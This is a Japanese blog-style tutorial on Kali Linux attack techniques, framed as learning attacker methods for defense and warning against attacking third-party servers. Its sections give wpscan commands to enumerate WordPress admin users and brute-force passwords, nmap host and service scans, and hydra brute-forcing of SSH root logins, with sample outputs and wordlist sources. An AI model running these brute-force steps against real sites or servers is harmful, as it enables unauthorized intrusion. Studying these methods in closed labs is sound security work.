Kali Linuxとは
Kali Linuxは先進的なペネトレーションテスト(侵入試験)やセキュリティ監査を実施するためのLinuxのディストリビューションである。
KaliはBackTrack Linuxの完全なる後継であり、Debian をベースに開発されている。
引用元:KALI LINUX OFFICIAL DOCUMENTATION | http://ja.docs.kali.org/introduction-ja/kali-linux%E3%81%A8%E3%81%AF
攻撃の手口
※この投稿の趣旨は、攻撃者側の手口を学び、防御に役立てることにあります。
この投稿内容を基に、第三者が管理するサーバ等に攻撃を仕掛けないでください。
投稿内容を実行する場合は、閉じたネットワーク内にて、自己責任でお願いします。
もしも、第三者が管理するサーバ等に攻撃を仕掛けた場合、以下のリスクがあります。
・プロバイダから警告が来ます。
・不正アクセスで逮捕、逮捕されなくても拘留されます。
・企業から賠償金を請求されます。
引用元:攻撃者の心理 Kali Linux紹介 1 | http://sys-guard.com/post-2896/
WPScanによる偵察とクラッキング
1.WordPressの管理者ユーザ名を取得する。
# wpscan --url "http://www.example.com/" --enumerate u
[+] Identified the following 1 user/s:
+----+---------------+-----------------+
| Id | Login | Name |
+----+---------------+-----------------+
| 1 | admin | admin ? |
+----+---------------+-----------------+
※上記のコマンドラインを実行中、以下の表示が出た際は、「N」を入力してEnterを押す。
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]N
2.WordPressの管理者パスワードをブルートフォースアタックによって取得する。
# wpscan --url "http://www.example.com/" --wordlist /root/passwordlist.txt --username admin
+----+---------------+------+----------+
| Id | Login | Name | Password |
+----+---------------+------+----------+
| | admin | | password |
+----+---------------+------+----------+
※--wordlistで指定する辞書ファイルは、/root配下に自分で作成したテキストファイルを使用している。
辞書ファイルは、以下の3パターンによって入手できる。
- 自作する。
- 世界中でよく使われているパスワードなどを基にテキストファイルを作成
- Kali Linuxのcrunchコマンドで作成。 http://d.hatena.ne.jp/ozuma/20130601/1370094859
- インターネット上からダウンロードする(以下のサイトは一例)。 http://download.openwall.net/pub/wordlists/
- Kali Linuxに標準で存在する辞書(/usr/share/dict/wordsや/usr/share/wordlists)
※上記のコマンドラインを実行中、以下の表示が出た際は、「N」を入力してEnterを押す。
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]N
3.WordPressに侵入
Webブラウザに http://www.example.com/wp-login.php と入力し、WordPressのログイン画面を表示させる。
ユーザ名とパスワードを入力し、管理画面(ダッシュボード)に入ることができれば侵入完了。
Nmapによる偵察
# nmap -sP (Networkaddress)/(Subnetmask)
# nmap -A (IPaddress)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
※-sPでネットワーク内で稼働中のサーバを特定し、-Aでオープンなポートやサービスをスキャンする。
hydraによるSSHポートへのブルートフォースアタック
# hydra -L /root/userlist.txt -P /root/passwordlist.txt (IPaddress) ssh
[DATA] attacking service ssh on port 22
[22][ssh] host: (IPaddress) login: root password: acb123
サーバに対してSSHで接続し、rootのパスワードを入力して侵入する。
※-Lで指定するユーザクラック用辞書ファイルと、-Pで指定するパスワードクラック用辞書ファイルは、/root配下に自分で作成したテキストファイルを使用している。
辞書ファイルは、以下の3パターンによって入手できる。
- 自作する。
- 世界中でよく使われているパスワードなどを基にテキストファイルを作成
- Kali Linuxのcrunchコマンドで作成。 http://d.hatena.ne.jp/ozuma/20130601/1370094859
- インターネット上からダウンロードする(以下のサイトは一例)。 http://download.openwall.net/pub/wordlists/
- Kali Linuxに標準で存在する辞書(/usr/share/dict/wordsや/usr/share/wordlists)
参考文献
Kali Linuxのhydraでブルートフォースを試す
http://d.hatena.ne.jp/ozuma/20130601/1370094859辞書攻撃に使う元ネタの辞書ファイル
http://d.hatena.ne.jp/ozuma/20130605/1370367162